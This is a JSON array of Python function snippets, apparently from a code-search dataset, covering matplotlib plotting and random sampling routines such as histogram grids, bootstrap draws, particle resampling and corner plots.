[ "def plot_random_sample(pattern, num_to_select, row_no, col_no, c_map=\"viridis\"):\n mpl.rc(\"image\", cmap=c_map)\n all_images = get_image_paths(pattern)\n sampled_img = get_rand_img(num_to_select, all_images)\n plot_grid(row_no, col_no, sampled_img)", "def sample_and_plot(self):\n fig = plt.figure()\n ax = plt.axes(projection = '3d')\n ax.plot_surface(self.X, self.Y, self.sample(), cmap = plt.cm.jet, rstride = 2, cstride = 2, linewidth = 1)\n plt.show()", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n sc = self.ax.scatter(NP.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(sc)\n return sc\n\n #l, = self.ax.plot(NP.arccos(corrcoef), stddev,\n # *args, **kwargs) # (theta,radius)\n #self.samplePoints.append(l)#\n #return l", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n sc = self.ax.scatter(NP.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(sc)\n return sc\n\n #l, = self.ax.plot(NP.arccos(corrcoef), stddev,\n # *args, **kwargs) # (theta,radius)\n #self.samplePoints.append(l)#\n #return l", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n\n l, = self.ax.plot(NP.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(l)\n\n return l", "def add_sample(self, stddev, corrcoef, *args, **kwargs):\n\n l, = self.ax.plot(np.arccos(corrcoef), stddev,\n *args, **kwargs) # (theta,radius)\n self.samplePoints.append(l)\n\n return l", "def draw(self, nsamples):\n \n if self.dist == 'normal':\n mean = self.mean\n sd = self.sd\n self.sample = sd * np.random.randn(nsamples) + mean\n \n elif self.dist == 'poisson':\n lam = self.lam\n self.sample = np.random.poisson(lam, size=nsamples)\n \n elif self.dist == 'binomial':\n n = self.n\n p = self.p\n self.sample = np.random.binomial(n, p, size=nsamples)\n \n else:\n print('dist must be normal, poisson or binomial')", "def selectFigures(self):\n # Shuffle the dictionary\n dict_items = list(self.pathCrr.items())\n random.shuffle(dict_items)\n self.pathCrr = {}\n self.pathCrr = {key:value for (key,value) in dict_items}\n\n self.nextBarFigure()\n self.nextLineFigure()", "def plot_sample(x, y, axis):\n img = x.reshape(96, 96)\n axis.imshow(img, cmap='gray')\n axis.scatter(y[0::2] * 48 + 48, y[1::2] * 48 + 48, marker='x', s=10)", "def plot_sample(self):\n print(u'plot_sample()')\n data_set = self.data_sets[1]\n scenario = u'Greedy Search'\n titles = [u'Collaborative Filtering', u'Content-based']\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n for i, rec_type in enumerate(data_set.missions):\n graph = data_set.folder_graphs + rec_type + '_' + str(15) + u'.txt'\n for strategy in Strategy.strategies:\n m = data_set.missions[rec_type][graph][strategy][scenario]\n m.compute_stats()\n ppl.plot(axes[i], np.arange(STEPS_MAX + 1),\n m.stats, label=strategy, linewidth=2)\n axes[i].set_xlabel(u'#Hops')\n axes[i].set_ylabel(u'Success Ratio')\n axes[i].set_ylim(0, 85)\n axes[i].set_xlim(0, STEPS_MAX * 1.01)\n axes[i].set_title(titles[i])\n ppl.legend(axes[i], loc=0)\n\n\n # plt.suptitle(u'Greedy Search on the BookCrossing for N=15',\n # size='xx-large', x=0.5)\n fig.subplots_adjust(left=0.08, right=0.97, top=0.9)\n\n plt.savefig('plots/sample.png')\n plt.savefig('plots/sample.pdf')", "def sample_plot(self, sample_pre, sample_post, circle_size=10.0):\n colored_samples = [[] for i in range(5)]\n for inputs, label in zip(sample_pre, sample_post):\n x, y = self.attacker_position(inputs)\n colored_samples[label].append((x, y))\n 
for label, points in enumerate(colored_samples):\n plt.scatter([x for x, y in points], [y for x, y in points],\n color=self.color(int(label)), s=circle_size)", "def plot_rand(txyxidata, b,X, outfile):\r\n\t\r\n\tme = \"LE_Plot.plot_rand: \"\r\n\tif os.path.isfile(outfile): return me+\"skip\"\r\n\tt0 = time.time()\r\n\tshowplot = False\r\n\t\r\n\tt, x, eta, xi = txyxidata\r\n\tdel txyxidata\r\n\ttmax = np.ceil(t.max())\r\n\t\r\n\t## Plot walk\r\n\tfs = 25\r\n\twinsize = int(tmax/80)\r\n\tfig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\r\n\tfig.suptitle(outfile)#+\"\\n\"+str(argv)[1:-1])\r\n\tenvelope_plot(t, xi, winsize, ax=ax1)\r\n\tax1.set_ylabel(\"$\\\\xi$\",fontsize=fs)\r\n\tenvelope_plot(t, eta, winsize, ax=ax2)\r\n\tax2.set_ylabel(\"$\\eta$\",fontsize=fs)\r\n\tenvelope_plot(t, x, winsize, ax=ax3)\r\n\tax3.plot([0,t.max()],[X,X],\"k--\"); ax3.plot([0,t.max()],[-X,-X],\"k--\")\r\n\tax3.set_xlabel(\"$t$\",fontsize=fs);ax3.set_ylabel(\"$x$\",fontsize=fs)\r\n\tetalim = np.ceil(abs(eta).max())\t## Not perfect\r\n\t#fig.tight_layout()\r\n\tplt.savefig(outfile)\r\n\tprint me+\"Plot saved as\",outfile\r\n\tprint me+\"Plotting random data:\",round(time.time()-t0,1),\"seconds\"\r\n\tif showplot:\t\tplt.show()\t\r\n\t\r\n\tplt.close(fig)\t\r\n\treturn", "def plot_some_spikes(ax, waveforms, n_max=20, **kwargs):\n from numpy import random\n N = waveforms.shape[0]\n sample = random.choice(N, min(N, n_max), replace=False)\n ax.cla()\n ax.plot(waveforms[sample].T, **kwargs)", "def plot_sample(x):\n plt.imshow(x[:,:,0])\n plt.title(\"gasf\")\n plt.colorbar()\n plt.show()\n\n plt.imshow(x[:,:,1])\n plt.title(\"gadf\")\n plt.colorbar()\n plt.show()\n\n plt.imshow(x[:,:,2])\n plt.title(\"mtf\")\n plt.colorbar()\n plt.show()", "def randomShow(x,n,picsize):\n col = 10\n row = int(np.ceil(n/10.0))\n fig,ax = plt.subplots(row,col)\n #rnd = np.random.randint(0,np.size(x,0),n)\n rnd = np.arange(0,n)\n xl = x[rnd].reshape((n,picsize[0],picsize[1]))\n for i in range(0,row):\n for j in range(0,col):\n # if not transpose xl[i*col+j], the picture will show horizontally\n ax[i,j].imshow(xl[i*col+j].T,cmap=plt.cm.gray)\n ax[i,j].set_xticks([])\n ax[i,j].set_yticks([])\n plt.axis('off')", "def draw_random_sample(grids, steps=None, connection=None):\n sample = random.randint(0, grids.shape[0] - 1)\n draw_grid(grids[sample])\n print (\"sample no. 
%d\" % sample)\n if steps is not None:\n print (\"steps: %d\" % steps[sample])\n if connection is not None:\n print (\"connection: %d\" % connection[sample])", "def draw_bs_sample(data):\n return rg.choice(data, size=len(data))", "def drawSample(self, index, color):\n t = Trajectory.createFromTuples(self.graphs[index])\n l = t.sampleSegments(self.sample_number, include=self.include)\n for e in l:\n p = Point(*e, radius=5, conversion=False)\n p.show(self.context)", "def plot_samples(s):\r\n assert len(s[0, :]) >= 2, ('The Phase space dimensions are less than two.', ' Need at least two to plot.')\r\n fig = plt.figure(1)\r\n if len(s[0, :]) >= 3:\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.scatter(s[:, 0], s[:, 1], s[:, 2])\r\n fig = plt.figure(2)\r\n plt.scatter(s[:, 0], s[:, 1])\r\n plt.show()", "def plot_random_generated_images(self):\n dimensions=(10, 10)\n figsize=(10, 10)\n n_samples=100\n \n (X, _), _ = self.generate_generator_prediction_samples(n_samples)\n \n self.grid_plot(X, dimensions=dimensions, figsize=figsize)", "def plot_sample_distribution(samples):\n plt.hist(samples, 50)\n plt.xlabel('Value of a sample')\n plt.ylabel('Number of samples')\n plt.title('Sample distribution')\n plt.show()", "def sample(self):\n return self.items[self.np_random.choice(len(self.items))]", "def test_random_multi_image():\n\n shap.image_plot([np.random.randn(3, 20, 20) for i in range(3)], np.random.randn(3, 20, 20), show=False)", "def draw_bs_sample(data):\n return np.random.choice(data, size=len(data))", "def _nd_plot_samples(self, **kwargs):\n\n from pesummary.core.plots.plot import _make_comparison_corner_plot as plotfunc\n\n plotkwargs = kwargs.copy()\n\n args = [self._samples]\n plotkwargs[\"corner_parameters\"] = self.parameters\n if \"latex_labels\" not in kwargs:\n plotkwargs[\"latex_labels\"] = self.latex_labels\n\n if \"plot_percentile\" not in kwargs:\n plotkwargs[\"plot_percentile\"] = False\n\n # get ranges for each parameter to set figure axes extents\n if \"range\" not in kwargs:\n range = []\n for param in self.parameters:\n range.append(\n [\n np.min(\n [samps[param].min() for samps in self._samples.values()]\n ),\n np.max(\n [samps[param].max() for samps in self._samples.values()]\n ),\n ]\n )\n plotkwargs[\"range\"] = range\n\n # default to not show quantile lines\n plotkwargs.setdefault(\"quantiles\", None)\n\n # set default injection line color\n plotkwargs.setdefault(\"truth_color\", \"k\")\n\n # set injection parameter values\n if self.injection_parameters is not None:\n injpars = [\n self.injection_parameters[p] - self.parameter_offsets[p]\n for p in self.parameters\n if self.injection_parameters[p] is not None\n ]\n if len(injpars) == self._num_parameters:\n plotkwargs[\"truths\"] = injpars\n\n # create plot\n with DisableLogger():\n fig = plotfunc(*args, **plotkwargs)\n\n # turn frame off on legend\n fig.legends[0].set_frame_on(False)\n\n return fig", "def lattice_sample_taken(self, ind, series):", "def test_plot_picks(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n pickdb = PickDatabaseConnection(':memory:')\n for pick in uniq_picks:\n pickdb.update_pick(**pick)\n splt = SEGYPickPlotter(ax, self.segy, pickdb)\n # should add a single artist to the line dict. 
for each event\n splt.plot_picks()\n for event in self.pickdb.events:\n self.assertTrue(len(splt.ACTIVE_LINES[event]), 1)\n # should be able to add new picks and have them be accessible by the\n # SEGYPickPlotter\n new_event = '--tracer--'\n new_pick = copy.copy(uniq_picks[0])\n new_pick['event'] = new_event\n pickdb.update_pick(**new_pick)\n splt.plot_picks()\n self.assertTrue(new_event in splt.ACTIVE_LINES)", "def sample(self, seg_logit, seg_label):", "def show_random_samples(batch, rows=5, cols=5, width=None, height=None, shuffle=True):\n if width is None: width = 1.5*cols\n if height is None: height = 1.5*rows\n\n if rows * cols == 1:\n axes = [plt.subplots(rows, cols, figsize=(width, height))[1]]\n else:\n axes = plt.subplots(rows, cols, figsize=(width, height))[1].flatten()\n\n # by default batch_size=1 in DataLoader\n for ax, x in zip(axes, DataLoader(TensorDataset(batch), shuffle=shuffle)):\n ax.imshow(x[0].reshape(batch.shape[-2:]), cmap=\"gray\")\n ax.axis('off')", "def choose_number_random_category(self):\n self.view.choose_number_random_category()", "def _choose_sample(self):\n\n \t #periodically generate a new reconstruction for the purposes of sampling", "def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n choices = ((0, 1, 2), (0, 2, 1), (1, 0, 2),\n (1, 2, 0), (2, 1, 0), (2, 0, 1))\n p = random.random()\n if p <= 0.5:\n idx = random.randint(0, 5)\n swap = choices[idx]\n image = image[:, :, swap]\n return {'image': image,\n 'landmarks': landmarks}", "def test_random_single_image():\n\n shap.image_plot(np.random.randn(3, 20, 20), np.random.randn(3, 20, 20), show=False)", "def plotSampleDistributions(\n samples,\n nXStart=0,\n nXStep=0,\n obsTitles=None,\n xRange=None\n):\n # Set up display\n font = \"Times\"\n sns.set(\n style=\"ticks\",\n font_scale=0.5,\n )\n matplotlib.rcParams['mathtext.fontset'] = 'cm'\n font = {\n 'family':'serif',\n 'serif': ['times new roman'],\n 'style': 'normal',\n 'variant': 'normal',\n 'weight': 'ultralight'\n }\n plt.rc('font', **font)\n\n # Number of columns and rows\n nObs = samples.shape[0]\n nX = samples.shape[1]\n # Access shifted range\n if xRange is None:\n xRange = np.arange(nXStart, nX, nXStep)\n nCols = len(xRange)\n samples = samples[:, nXStart::nXStep, :]\n\n if obsTitles is None:\n obsTitles = [r\"$\\mathcal{{O}}_{{{0}}}$\".format(no) for no in range(nObs)]\n\n # Create the figure grid\n fig, axs = plt.subplots(\n dpi=400,\n figsize=(0.8*nObs, 0.4*nCols),\n nrows=nCols,\n ncols=nObs,\n )\n\n # Loop through columns and rows\n for no, (axRow, corrData) in enumerate(zip(axs.T, samples)):\n for nx, (ax, corrDataNx) in enumerate(zip(axRow, corrData)):\n\n # Set titles, row labels and legend\n if nx == 0:\n ax.set_title(obsTitles[no], y=1.2)\n if no == 0:\n ax.set_ylabel(xRange[nx])\n if nx == 0 and no == 0:\n legends = [r\"$\\mu$\", \"Bins\", \"PDF\"]\n else:\n legends = [None, None, None]\n\n # Get mean and standard deviation of sample\n ## Plot an horizontal line at position\n mean, sdev = np.mean(corrDataNx), np.std(corrDataNx, ddof=1)\n ax.axvline(mean, color=\"black\", lw=0.5, ls=\"--\", label=legends[0])\n\n # Plot the histogram including KDE\n p = sns.distplot(\n corrDataNx,\n kde=True,\n norm_hist=True,\n ax=ax,\n kde_kws={\"alpha\":0.8, \"lw\":0.7},\n hist_kws={\"histtype\":\"stepfilled\"},\n label=legends[1]\n )\n\n # Plot the distribution estimate\n x = np.linspace(*p.get_xlim(), num=100)\n ax.plot(\n x,\n stats.norm.pdf(x, loc=mean, scale=sdev),\n ls=\"--\", lw=1.0,\n label=legends[2]\n 
)\n\n # set legend if fist entry\n if nx == 0 and no == 0:\n ax.legend(\n loc=\"center\",\n fontsize=\"xx-small\",\n bbox_to_anchor=[-0.1, 1.5, 0, 0],\n frameon=True\n )\n\n # Further styling\n ## Remove y-axis\n ax.set(yticks=[])\n ## Set up x-axis to only contain mu values on top\n ax.set_xticks([mean])\n ## Create mu text\n mustr = r\"$\\mu ={mu} $\".format(mu=gv.gvar(mean, sdev))\n if \"e-\" in mustr:\n mustr = re.sub(\"e-0*([1-9]+)\", r\"\\cdot 10^{-\\g<1>}\", mustr)\n ax.set_xticklabels([mustr], fontdict={\"size\":\"xx-small\"})\n ax.xaxis.tick_top()\n ax.tick_params(direction='out', length=0, width=0.5, pad=-0.5, top=True)\n\n ## Reduce line width of visible axis\n ax.spines[\"bottom\"].set_linewidth(0.5)\n ax.spines[\"top\"].set_linewidth(0.)\n\n # Remove other remaining axis\n sns.despine(fig, left=True, right=True, top=False)\n # And adjust intermediate distances\n fig.subplots_adjust(wspace=0.05, hspace=0.45)\n\n return fig", "def seed_plots(self, bcut=5, subset=None, title=None):\n z = self.seeds if subset is None else self.seeds[subset]\n fig,axx= plt.subplots(1,3, figsize=(12,4))\n plt.subplots_adjust(left=0.1)\n bc = np.abs(z.b)<bcut\n histkw=dict(histtype='step', lw=2)\n def all_plot(ax, q, dom, label):\n ax.hist(q.clip(dom[0],dom[-1]),dom, **histkw)\n ax.hist(q[bc].values.clip(dom[0],dom[-1]),dom, color='orange', label='|b|<%d'%bcut, **histkw)\n plt.setp(ax, xlabel=label, xlim=(None,dom[-1]))\n ax.grid()\n ax.legend(prop=dict(size=10))\n all_plot(axx[0], z['size'], np.linspace(0.5,10.5,11), 'cluster size')\n all_plot(axx[1], z.ts, np.linspace(0,50,26), 'TS')\n all_plot(axx[2], np.sin(np.radians(z.b)), np.linspace(-1,1,41), 'sin(b)')\n axx[2].axvline(0, color='k')\n fig.suptitle('{} {} seeds from model {}'.format( len(z), self.tsname, self.input_model,)\n if title is None else title)\n fig.set_facecolor('white')\n return fig", "def _draw_from_distr(self, values, pairs, randomize):\n # sample size one less than pairs specification as pairs contain\n # the total mass and component percentages. 
These are transformed\n # into component masses\n sample = [None for i in range(len(pairs)-1)]\n for i in range(len(pairs)):\n vs = pairs[i]\n mean = values[2*i]\n std = values[2*i+1]\n if std>0.0 and randomize:\n samplemean = random.gauss(mean, std)\n else:\n samplemean = mean\n if vs[0] == 'mass':\n samplemass = samplemean\n remainingmass = samplemean\n elif vs[0] != 'water':\n compmass = samplemass * samplemean\n sample[vs[1]] = compmass\n remainingmass -= compmass\n elif vs[0] == 'water':\n waterind = i\n sample[pairs[waterind][1]] = remainingmass\n return sample", "def random_sample_objs(num_per_cat):\n\n obj_path_lists = load_object_lists(g_render_objs)\n obj_path_list = []\n\n for pathes in obj_path_lists:\n pathes = list(pathes)\n random.shuffle(pathes)\n if num_per_cat > len(pathes):\n num_per_cat = len(pathes)\n samples = random.sample(pathes, num_per_cat)\n obj_path_list += samples\n\n return obj_path_list", "def plotfrom_catcorr(self, cat_corr, **pltkwargs):\n\n catdict = cat_corr['catalog']\n corrdict = cat_corr['correction']\n\n dlosclass = Dlos(cat_corr)\n dlos_file = dlosclass.file_name \n\n if 'binsize' in pltkwargs.keys(): \n binsize = pltkwargs['binsize']\n pltkwargs.pop('binsize', None) # remove from dictionary\n else: \n binsize = 0.5 # (default)\n\n xmid, dlos_hist = dlosclass.dlos_dist( binsize = binsize )\n \n if 'label' not in pltkwargs.keys(): \n if 'cmasslowz' in catdict['name']: \n catname = 'cmasslowz'\n else: \n catname = catdict['name']\n\n pltkwargs['label'] = ''.join([\n catname, ':', \n corrdict['name']\n ])\n elif pltkwargs['label'] == False: \n pass\n \n if 'rescale' in pltkwargs.keys(): \n dlos_hist = dlos_hist * pltkwargs['rescale']\n pltkwargs.pop('rescale', None)\n\n self.sub.plot(xmid, dlos_hist, **pltkwargs) \n \n self.hist_max = max([ dlos_hist.max(), self.hist_max ]) \n\n return None", "def drawCatplot(df, xColumn):\n plt.style.use('default')\n plt.style.use('dark_background')\n types = getSpectralTypes()\n colors = getColors()\n sns.set_palette(sns.color_palette(colors))\n \n sns.catplot(x=xColumn, y=\"spectral_type\", data=df, order=types, height=3, \n aspect=4);\n plt.show()", "def plotspec(ant,freq=True,test=False):\n snap.write_int('rst',1)\n snap.write_int('antenna',ant);\n snap.write_int('rst',0)\n\n ## Test\n if (test):\n if ant in [2,3,6,7,10,11]:\n test = (np.linspace(256,511,num=256,dtype='uint64')**2)*(ACC_LEN/256)\n else:\n test = (np.linspace(0,255,num=256,dtype='uint64')**2)*(ACC_LEN/256)\n plt.plot(test,'.',label='test')\n \n ## Wait for vector to get accumulated\n time.sleep(ACC_LEN/(512*200e6)*1e3)\n arr = struct.unpack('>256Q',snap.read('spectrum',8*256))\n if (freq):\n plt.plot(FREQ,arr,'.-',lw=1,label='%s'%ANT_LABELS[ant])\n plt.xlim(FREQ.max(), FREQ.min())\n else:\n plt.plot(arr,lw=2,label='%s'%ANT_LABELS[ant])", "def make_plot(x,y):", "def plot(self, subsample=None, valid_instance_types=None):\n pt = self.sample_indices(subsample, valid_instance_types)\n\n x, y, z = self.pc[pt, 0], self.pc[pt, 1], self.pc[pt, 2]\n color = self.color[pt]\n\n return plot_pointcloud(x, y, z, color=color)", "def plot(self, show=True):\n xs, ys = zip(*[(float(ix)/self.sample_rate, val)\n for ix, val in enumerate(self.samples)])\n plt.plot(xs, ys)\n if show:\n plt.show()", "def draw_random_sample(choices, probabilities, n):\n values = np.array(range(len(choices)))\n probs = np.array(probabilities)\n bins = np.add.accumulate(probs)\n inds = values[np.digitize(random_sample(n), bins)]\n samples = []\n for i in inds:\n 
samples.append(deepcopy(choices[int(i)]))\n return samples", "def plotRandImages(train_data, output):\n rint_array = np.random.randint(0,train_data.shape[0],size=4)\n\n fig = plt.figure(figsize=(8,8))\n plt.subplot(2,2,1)\n for ii,rint in enumerate(rint_array):\n plt.subplot(2,2,ii+1)\n img = train_data[rint].reshape((20,20)).T\n #print \" output: \",output[rint]\n plt.imshow(img,aspect='auto',interpolation='nearest',\n origin='lower')\n plt.title('Image of %d'%output.T[rint])\n plt.show()\n\n return", "def draw_random_sample(n, probabilities, k):\n # sets up an index list for the chosen particles, and makes bins for the probabilities\n values = np.array(range(len(n)))\n probabilities = np.array(probabilities)\n bins = np.add.accumulate(probabilities)\n new_values = values[np.digitize(random_sample(n), bins)] # choose the new particles based on the probabilities of the old ones\n samples = []\n for i in new_values:\n samples.append(deepcopy(n[int(i)])) # make a new particle cloud\n return samples", "def draw_sample(self, samp_pts=None, means=None, covar=None):\n raise NotImplementedError('Abstract Method')", "def plot_scatter(chimera, singles, chisum, lorder, figname, mincount):\n def scatit(dname, dname2, grd, i, j, l1, l2, lln, cur_name):\n \"\"\"\n scatterplot the specific plot\n \"\"\"\n lkeys = set(dname[l1].keys()) & set(dname2[l2].keys())\n xvec = []\n yvec = []\n for k in lkeys:\n if dname[l1][k] > mincount or dname2[l2][k] > mincount:\n xvec.append(dname[l1][k]+1)\n yvec.append(dname2[l2][k]+1)\n spr = spearmanr(xvec, yvec)\n #print \"*\" * 100\n #my addition - print to stdout the pairs and the values\n # print cur_name, l1, l2, spr[0] ,spr[1]\n im = grd[i*lln + j].hexbin(\n xvec, yvec, xscale = 'log', yscale = 'log', bins='log', mincnt=1,\n gridsize=(50,50))\n# grd.cbar_axes[i*lln+j].colorbar(im)\n\n grd[i*lln + j].text(10, 10e4, \"r=%.2f\"%(spr[0]), size=6, color='m')\n grd[i*lln + j].set_xlim([10e0, 10e5])\n grd[i*lln + j].set_ylim([10e0, 10e5])\n grd[i*lln + j].set_yscale('log')\n grd[i*lln + j].set_xscale('log')\n grd[i*lln + j].set_xticks([10e0, 10e2, 10e4])\n# grd[i*lln + j].set_xticklabels([k[0] for k in grd[i*lln + j].get_xticklabels()], rotation=45)\n grd[i*lln + j].set_yticks([10e0, 10e2, 10e4])\n grd[i*lln + j].set_ylabel(l1)\n grd[i*lln + j].set_xlabel(l2, rotation=45)\n# tight_layout()\n return spr\n lln = len(lorder)\n corrs = zeros((lln, lln))\n fig = figure(1, (8, 8), 300)\n rcParams.update({'font.size': 8})\n# f, axarr = subplots(lln, lln, sharex=True, sharey=True)\n grid = ImageGrid(fig, 111, # similar to subplot(111)\n nrows_ncols = (lln, lln), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes in inch.\n aspect=True,\n# cbar_mode=\"each\"\n ) \n for i, l1 in enumerate(lorder):\n for j, l2 in enumerate(lorder):\n if i>j: # Print singles\n corrs[i, j] = scatit(\n singles, singles, grid, i, j, l1, l2, lln, \"sing-sing\")[0]\n elif i==j:\n corrs[i, j] =scatit(singles, chisum, grid, i, j, l1, l2, lln, \"sing-chim\")[0]\n else:\n corrs[i, j] = scatit(\n chimera, chimera, grid, i, j, l1, l2, lln, \"chim-chim\")[0]\n xlabel(l1)\n ylabel(l2)\n rcParams.update({'font.size': 8})\n for ax in fig.get_axes():\n ax.tick_params(which='minor', direction='out')\n savefig(figname, dpi=300)\n return corrs", "def plot(self, *args):\n return self.vocab().plot(*args)", "def show_rand_conn(random_conn_parameters):\n\n fig = plt.figure(figsize=(8.5, 8.5))\n ax = fig.add_subplot(111)\n colors = cm.rainbow(np.linspace(\n 0, 1, random_conn_parameters['nb_random_conn']))\n\n 
for x_pix, z_pix, x_neigh, z_neigh, c in zip(\n random_conn_parameters['x_pixel'], random_conn_parameters['z_pixel'],\n random_conn_parameters['x_neigh'], random_conn_parameters['z_neigh'], colors):\n ax.scatter(x_pix, z_pix, color=c)\n ax.scatter(x_neigh, z_neigh, color=c)\n ax.plot([x_pix, x_neigh], [z_pix, z_neigh], color=c, linewidth=1)\n\n plt.title('Random connectivity')\n ax.set_xlabel('X (pixel)')\n ax.set_ylabel('Z (pixel)')\n plt.show()\n\n return", "def draw_sample(self, samp_pts=None, means=None, covar=None):\n return self.gp_core.draw_samples(1, X_test=samp_pts, mean_vals=means,\n covar=covar).ravel()", "def main():\n # Initialize the Serpinski set\n print(\"==> Making serpinski set...\")\n my_serpinski = Serpinski(400, 400, 0)\n num = 8\n print(\"==> Generating\", num, \"levels of subsets :)\")\n for _ in range(9):\n my_serpinski.add_subset()\n # Draw Serpinski\n # print(\"==> Drawing the set. This might take quite some time!\\\n # Damn Inefficient!\")\n # my_serpinski.draw_me()\n\n # Initialize Coordinates\n length = 50000 # Number of random dots\n x_coord = []\n y_coord = []\n index = 0\n\n # try length particles in serp set\n print(\"==> Randomly choosing\", length, \"dots...\")\n while index < length:\n # Check if dot in bound\n rand_y = np.random.uniform(low=400.0 - 200.0 * np.sqrt(3) / 2.0,\n high=400.0)\n # rand_x in triangle // condition //\n diff = 400.0 - rand_y\n x_diff = diff / np.sqrt(3)\n rand_x = np.random.uniform(low=400.0 - x_diff,\n high=400 + x_diff)\n\n if my_serpinski.is_bound(rand_x, rand_y):\n x_coord.append(rand_x)\n y_coord.append(rand_y)\n index += 1\n\n # Draw image using scatter\n print(\"Scattering the dots ;)\")\n plt.scatter(x_coord, y_coord, s=0.1)\n # Show image\n dpi = 600\n print(\"==> Saving to .jpg with dpi=\", dpi)\n plt.savefig(\"fractalstuff.jpg\", dpi=dpi, bbox_inches='tight')", "def jax_display_samples(ax, x, color):\n kde = KernelDensity(kernel=\"gaussian\", bandwidth=0.005).fit(x)\n t_plot = np.linspace(-0.1, 1.1, 1000)[:, np.newaxis]\n dens = np.exp(kde.score_samples(t_plot))\n dens = jax.ops.index_update(dens, jax.ops.index[np.array([0,-1])], [0,0])\n ax.fill(t_plot, dens, color=color)", "def sample(self, x):", "def sample(self, observation):\n raise NotImplementedError", "def plot_ordination(res, choices=[1,2],\n axis_names='PC', constrained_names=None,\n samples_kw={}, species_kw={}, centroids_kw={}, biplot_kw={},\n axline_kw={}):\n choices = asarray(choices) -1\n samples, species, centroids, biplot, evals = [asarray(res.get(k, None))\n for k in ['samples', 'species', 'centroids', 'biplot', 'eigvals']]\n if isinstance(axis_names, str):\n axis_names = ['%s%i' % (axis_names, i+1) for i in range(len(evals))]\n # draw the axis lines\n axline_kw = dict({'color':'gray'}, **axline_kw)\n pylab.axvline(**axline_kw)\n pylab.axhline(**axline_kw)\n # calc percentages from evals and label them\n evals = asarray(evals)\n evals[evals<0] = 0\n percs = 100 * (evals / evals.sum())\n pylab.xlabel('%s - %.2f%%' % (axis_names[choices[0]], percs[choices[0]]))\n pylab.ylabel('%s - %.2f%%' % (axis_names[choices[1]], percs[choices[1]]))\n #plot the species points in red +\n if any(species):\n species_kw = dict({'cml': 'r+', 'label_kw':{'size':'smaller'}},\n **species_kw) #set default\n plot_points(species[:, choices], **species_kw)\n # scatter the sample points in black\n default = {'c': 'k', 's': 50, 'alpha': 0.5, 'label_kw': {'size': 'medium'}}\n scatter_points(samples[:, choices], **dict(default, **samples_kw))\n # scatter the centroids\n if 
any(centroids):\n default = {'c':'b', 's':0, 'label': 'X', 'label_kw':{'size':'larger',\n 'color':'b', 'ha':'center', 'va':'center'}}\n scatter_points(centroids[:, choices], **dict(default, **centroids_kw))\n # arrow the biplot points\n if any(biplot):\n default = {'c':'b', 'label_kw':{'size':'larger', 'color':'b'}}\n arrows([[0,0]] * len(biplot), biplot[:, choices],\n **dict(default, **biplot_kw))\n # calc the constrained percentage and title it\n if constrained_names:\n if isinstance(constrained_names, str): #a prefix\n constrained_names = [n for n in axis_names if\n n.startswith(constrained_names)]\n con_idxs = [i for i, n in enumerate(axis_names)\n if n in constrained_names]\n con_perc = percs[con_idxs].sum()\n pylab.title('%.2f%% constrained' % con_perc)", "def sample(self, point, n_samples=1):\n raise NotImplementedError(\"The sample method is not yet implemented.\")", "def plot_data(self):", "def plot_individual(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n # fig_title = yprop + item[\"cation_type\"] # Plot by cation\n fig_title = yprop # All together\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111) \n ax.scatter(x,y, s=70, zorder=2, color=color_dict[item[\"cation_type\"]], linewidths=2.5, edgecolors='black')\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dashed')\n elif item[\"path_id\"][-3:] == \"003\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dotted')\n else:\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([0,100])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n plt.show()", "def plot(self):\n\t\tself.plotOfSpect()", "def sample(self, num_samples, **kwargs):\n pass", "def sample_selection(attr, old, new):\n if len(new) == 0:\n source.data = source.from_df(merged_data)\n else:\n samples = [s+1 for s in new]\n selected_data = merged_data.loc[merged_data['sample_num'].isin(samples)]\n source.data = source.from_df(selected_data)\n z = np.linspace(min(source.data['redshift']), max(source.data['redshift']), 100)\n cosmo_distmod_range = cosmo.distmod(z=z).value\n source.data['z_range'] = z\n source.data['cosmo_distmod_range'] = cosmo_distmod_range", "def visualize_samples(samples, discretized_samples, grid, low=None, high=None):\n\n fig, ax = plt.subplots(figsize=(10, 10))\n\n # Show grid\n ax.xaxis.set_major_locator(plt.FixedLocator(grid[0]))\n ax.yaxis.set_major_locator(plt.FixedLocator(grid[1]))\n ax.grid(True)\n\n # If bounds (low, high) are specified, use them to set axis 
